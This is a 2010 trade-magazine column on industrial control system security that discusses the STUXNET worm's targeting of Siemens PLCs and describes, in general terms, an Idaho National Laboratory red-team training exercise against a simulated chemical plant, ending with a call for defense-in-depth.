November 22, 2024

Who’s afraid of the big bad worm?
SECURITY SESSIONS: Volume 2 No. 7

by William T. (Tim) Shaw, PhD, CISSP
Welcome to the final installment of Security Sessions for 2010. Another year has passed, but the perennial challenge facing the engineers and IT folks tasked with providing cyber security for our industrial infrastructure is the still-lingering belief – mainly within upper management – that nothing bad has happened so all this effort must be just a waste of time and resources. Too many managers still think their automation systems are too isolated or far too complex to be the target of a cyber attack. They may pay lip service to cyber security to keep regulators off their backs, but they don’t truly believe that they are ‘at risk’. This could be a big mistake; read on, and you’ll learn why… – Tim

William T. (Tim) Shaw
PhD, CISSP

The industrial automation cyber security forums have been ablaze lately with comments, thoughts and theories about the STUXNET worm that was recently released onto the computer automation world. That particular piece of software is a marvel of sophistication and frightening in its specificity and capabilities. It is also interesting in that it was apparently designed to be delivered via infected thumb drives, rather than propagating between systems using network-based attacks against vulnerable applications as is the case with most worms. It’s almost as if the designers wanted to keep it from spreading too widely!

The STUXNET worm specifically targets Siemens PLC-based automation systems and infects their Microsoft Windows based operator or engineering workstations by exploiting a known vulnerability. I say it targets Siemens systems because it specifically looks for Siemens PLCs1 as part of its design. Once ensconced in such a PC/workstation, it apparently communicates with the system’s PLCs – using the native Siemens communications protocol – and manipulates the program logic, just as you could if you were running the Siemens programming tools in those workstations yourself.

This worm required a lot of detailed technical knowledge about Siemens systems and PLCs as well as general understanding of the PLC logic functions that are important for controlling high-speed rotating equipment. In my view, the really scary thing is that by altering the payload to use other popular PLC communications protocols and programming commands, this malware could be converted to attack a much broader base of industrial automation systems.

Because they were designed to be general-purpose automation building blocks, PLCs support a range of communication functions that include logic/program downloading as well as data acquisition, plus command and control. Thus, it is not necessary for a cyber attacker to actually infect the PLC with malware. In fact, that would be quite difficult to do since the communication functions don’t provide access to the main processor’s programming. But, the attacker can re-task the PLC by sending it program logic changes.

This behavior has already been demonstrated with Siemens PLCs, but the same approach could probably be used with virtually any PLC on the market today. We can patch the specific vulnerability used by the worm to infect the MS-Windows workstations, but there are several other well documented vulnerabilities that could be used just as easily. Worse yet, a new vulnerability is found practically every day – most often by the bad guys.

So, we now have seen the first – but probably not the last – malware specifically designed to attack industrial automation systems. This is not the run of the mill malware that attacks any type of system running a version of Windows or Linux that has the specific vulnerability it is designed to exploit whether an accounting system, an operator workstation on a distributed control system or even your own PC. Instead, this malware was highly targeted and specifically crafted for a specific purpose.

Its ability to spread via infected USB thumb drives is especially pernicious since many industrial control systems are “air gapped” in order to (supposedly) keep them safe from attack. In other words, they are not hard-wired into off-premise networks like the Web. Unfortunately, ‘sneakernet’ – so called ‘back doors’ into the system used by employees, operators, maintenance staff, etc. to get around firewalls and other security measures – trumps an air gap any day of the week. I have personally seen too many plants where everyone is walking around with a thumb drive in their pocket, and there is no procedure for certifying or scanning them. I have also been told by well-meaning (but poorly informed) plant engineers that the thumb drives were safe from infection because they were encrypted. This just shows that cyber security was not a priority at that plant and that only a token effort was being made to train and educate plant personnel on cyber security issues.

On a related note, I had the opportunity recently to attend an advanced industrial cyber security training course run by the Idaho National Laboratory. This course is an intensive, highly-technical, in-depth look into how hacking occurs and the tools and strategies employed by hackers. From a strictly educational viewpoint, the course is highly informative. It is designed to take the student through a series of lectures and hands-on exercises that demonstrates just how powerful the available tools are for attacking computer systems and how skilled attackers can use known vulnerabilities and security breaches to sneak into even well-defended networks.

The lab has created a simulated chemical company that has an actual web presence, a simulated corporate network, a simulated plant IT network and an actual industrial automation system complete with controllers, workstations and mixing vessels. The simulation includes typical enterprise firewalls at the connection point to the Internet, intrusion detection systems and additional firewalls isolating the plant networks from the corporate network and the plant network from the automation system. In other words, the setup is a surprisingly high-fidelity simulation of what an attacker would see and face if trying to invade and attack a real chemical plant automation system. They even simulate a range of Windows and Linux platforms with differing levels of patching and operating system versions – everything from Windows/NT servers to Ubuntu Linux, just as you might find on a real corporate network.

During the week various exercises allowed the students to try out various hacker pen-testing [penetration testing] software tools and to seek out vulnerabilities and exploit them. A great deal of time was spent playing with the Metasploit framework tools, one of the most powerful penetration testing platforms available today (to both the good and bad guys!). We also played with Nessus and learned about how to be stealthy in order to avoid triggering an intrusion detection system detection threshold.

It was quite a shock to realize how easy – and automated – the process was to locate, scan, fingerprint and attack computers using the available tools. Make no mistake, you have to be a reasonably competent programmer to devise your own tools and ‘payloads’, even using the Metasploit framework. But using the hundreds of exploits and payloads already in the database merely required knowing a few simple commands… and very little else!

The course included discussions about how to break through the Internet-facing corporate firewall and how to establish a covert communications connection through such as firewall. We learned about exotic payloads, which are bits of executable code or full programs that are inserted into the computer under attack. Such payloads can include powerful hacker tools that let you remotely use the computer you have infected and a platform for attacking deeper into a corporate network. (The term ‘pivot’ is used to describe a compromised computer being remotely used in this manner.)

We witnessed an attack that first compromised an internal PC by sending a spear-phishing email to multiple corporate personnel with a link to an evil website that planted malware on their PCs. One of those PCs – already inside the firewall – was then loaded with hacker tools and used to scan the internal corporate WAN. The attack continued by compromising a data historian that was allowed to communicate through another internal firewall to its mate on a control system LAN. That led to compromise of an operator console.

The eventual result was that the attackers recorded OPC messages on the control system LAN from controllers to operator consoles and then ‘replayed’ those messages while attacking the controllers. It was unnerving to see a split-screen display showing tanks overflowing while the operator consoles showed everything to be running normally. Sure, in the real world hard-wired safety/shutdown logic ought to have prevented a disaster, but within the limits of such safety logic you could severely degrade or compromise a batch of pharmaceuticals.

On the last day of the course we were divided into two teams: the RED team was to attack the corporate network and try to compromise the plant automation system. The BLUE team was to defend the corporate networks and systems. I was fortunate to be the leader of the RED team. We had some incredibly skilled people on that team, both from the U.S. military and from the IT world. I got to participate in what could only be called cyber war. The defenders fought with every mechanism they had available to them. In the end the RED team managed to out-score the defenders. It was quite a battle.

The point I am making – and the point INL is making with this course – is that the bad guys have very powerful tools and extensive knowledge of networks and system vulnerabilities. The STUXNET worm underlines this fact. And the moral of the story is that treating industrial automation cyber security as a secondary issue is a huge mistake, and one that could be quite costly. Let me be clear; I’m not a doomsayer, and I don’t believe that the bad guys are painting cyber bulls-eyes on all of our industrial facilities. One can safely assume that a plant that makes cat food is less likely to be intentionally targeted than a refinery or a power plant. But that cat food plant could be opportunistically subject to attack by a variation of the STUXNET worm in the future. Would you want to be the owner of that plant with “worms” in your cat food? No, I didn’t think so.

To effectively defend yourself and your assets from these threats, you’ll need to implement good cyber security policies and procedures, including providing defense-in-depth and comprehensive training of your personnel. As you might expect, there are many ways to protect yourself and maintain a high level of cyber security. But that will have to be the subject matter for a future session... see you in 2011! – Tim

About the Author

William T. “Tim” Shaw (PhD, CISSP) has been active in industrial automation for more than 30 years and is the author of Computer Control of BATCH Processes and CYBERSECURITY for SCADA Systems. Tim has contributed to several other books and is a prolific writer and presenter on a range of technical topics. He is currently a senior security consultant for SecuriCon, an information security solutions firm, based in Alexandria, Virginia. Tim has been directly involved in the development of several DCS and SCADA system products and regularly teaches courses for ISA (International Society of Automation) on various topics. Inquiries or comments about this column may be directed to Tim at Tim@electricenergyonline.com.
 

 1 Programmable Logic Controllers